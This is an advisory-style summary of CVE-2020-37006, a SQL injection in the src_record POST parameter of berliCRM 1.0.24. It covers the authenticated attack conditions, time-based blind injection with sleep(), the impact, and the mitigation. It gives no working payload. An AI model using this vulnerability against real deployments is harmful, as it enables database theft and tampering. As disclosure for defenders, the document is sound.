CVE-2020-37006

Vulnerability

Analysis

berliCRM version 1.0.24 is vulnerable to a SQL injection flaw in the src_record parameter passed via POST requests to index.php. The application fails to properly sanitize user input before incorporating it into SQL queries, enabling an attacker to manipulate the underlying database operations [2][3].

Exploitation

Conditions

An attacker must be authenticated with a valid session cookie to reach the vulnerable endpoint. The exploit is delivered through a crafted POST request where the src_record parameter contains a malicious payload, such as a time-based blind SQL injection that uses sleep() to exfiltrate data [2]. No special network position is required beyond standard HTTP access to the application.

Impact

Successful exploitation allows an attacker to extract sensitive information from the database, modify existing records, or even drop tables, potentially leading to complete compromise of the CRM system's data integrity and confidentiality. The CVSS v3 base score of 8.2 reflects the high confidentiality impact and low attack complexity [3].

Mitigation

As of the publication date, no official patch has been released for berliCRM 1.0.24. Users should upgrade to a later version or apply input validation and parameterized queries to mitigate the vulnerability. The exploit is publicly available, increasing the risk of active exploitation [2].